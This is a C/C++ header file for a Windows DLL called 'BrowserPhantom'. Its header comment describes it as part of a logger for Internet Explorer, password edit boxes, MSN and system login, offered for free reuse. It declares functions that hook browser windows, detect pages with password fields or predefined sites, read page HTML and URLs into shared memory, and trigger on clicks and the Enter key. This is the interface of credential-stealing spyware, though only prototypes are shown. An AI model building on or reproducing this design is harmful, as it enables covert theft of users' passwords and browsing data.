/************************************
  REVISION LOG ENTRY
  Revision By: Zhang, Zhefu
  E-mail: codetiger@hotmail.com
  Revised on 7/3/2003 
  Comment: This is part of the logger for IE, password edit, MSN, system login.
           You are free to use to use the code on the base of keeping this comment
		   All rights reserved. May not be sold for profit.
 ************************************/
// The following ifdef block is the standard way of creating macros which make exporting 
// from a DLL simpler. All files within this DLL are compiled with the BROWSERPHANTOM_EXPORTS
// symbol defined on the command line. this symbol should not be defined on any project
// that uses this DLL. This way any other project whose source files include this file see 
// BROWSERPHANTOM_API functions as being imported from a DLL, wheras this DLL sees symbols
// defined with this macro as being exported.
#ifdef BROWSERPHANTOM_EXPORTS
#define BROWSERPHANTOM_API __declspec(dllexport)
#else
#define BROWSERPHANTOM_API __declspec(dllimport)
#endif

#include "ComDef.h"

// External function prototypes
//Hook Part
//if The Second Browser Window in the same thread  Will Not Set A New Hook
BROWSERPHANTOM_API BOOL WINAPI InitBrowserLink(HWND hBrowser);
BROWSERPHANTOM_API BOOL WINAPI ExitBrowserLink(HWND hBrowser);

//Insert hBrowser into g_hBrowser and return the Array Index, NOT used in Service
//Called by InitBrowserPhantom Only
DWORD InsertBrowserHwnd(HWND hBrowser);
//Query hBrowser's index in g_hBrowser, NOT used in Service
BROWSERPHANTOM_API DWORD QueryBrowserHwndIndex(HWND hBrowser);

//When InitBrowserPhantom, Set Active Browser, Create Sink Connection  
BOOL  PushActiveBrowser(HWND hBrowser);
HWND  PopActiveBrowser(BOOL bDelete);

//Link Handle With IHTMLDocument2, Event...
BOOL  LinkCom(DWORD dwIndex);
BOOL  AntiLinkCom(DWORD dwIndex);

BROWSERPHANTOM_API HWND WINAPI QueryBrowserHandle(DWORD dwIndex);
//Note: If You Have the Handle of The Browser, Call QueryBrowserHwndIndex First
//Read the HTML Source, URL ... of the browser, Copy To MMF
BROWSERPHANTOM_API BOOL WINAPI QueryDocument(DWORD dwIndex, WPARAM dwType);
//dwType : WM_WPARAM_QUERY_HTML, WM_WPARAM_QUERY_URL ...

//Inside Read HTML source and URL information
BOOL InterQueryDocument(DWORD dwIndex, WPARAM dwType);


//Get Hooked Browser Number
BROWSERPHANTOM_API DWORD WINAPI GetBrowserArrayNumber();
//Check Browser Array State????
BROWSERPHANTOM_API void WINAPI CheckBrowserArray();
//Check the Browser Array and Confirm they are browser, if not, NULL it

//Query Browser Inside Type
//Inside Html There is Password Field
BROWSERPHANTOM_API BOOL WINAPI IsPwdBrowser(DWORD dwIndex);
//Some Pre defined Site such as Following
BROWSERPHANTOM_API BOOL WINAPI IsPreDefBrowser(DWORD dwIndex);

BOOL InterIsPwdBrowser(DWORD dwIndex);
enumPreDefinePage InterIsPreDefBrowser(DWORD dwIndex);

//Query g_dwBrowserState
BROWSERPHANTOM_API DWORD WINAPI QueryBrowserState(DWORD dwIndex);

//Called by BeforeNavigate2 (Currently Called by WM_LBUTTONDOWN WM_KEYDOWN-VK_RETURN
BOOL Trigger(DWORD dwIndex);
BOOL Trigger2(DWORD dwIndex);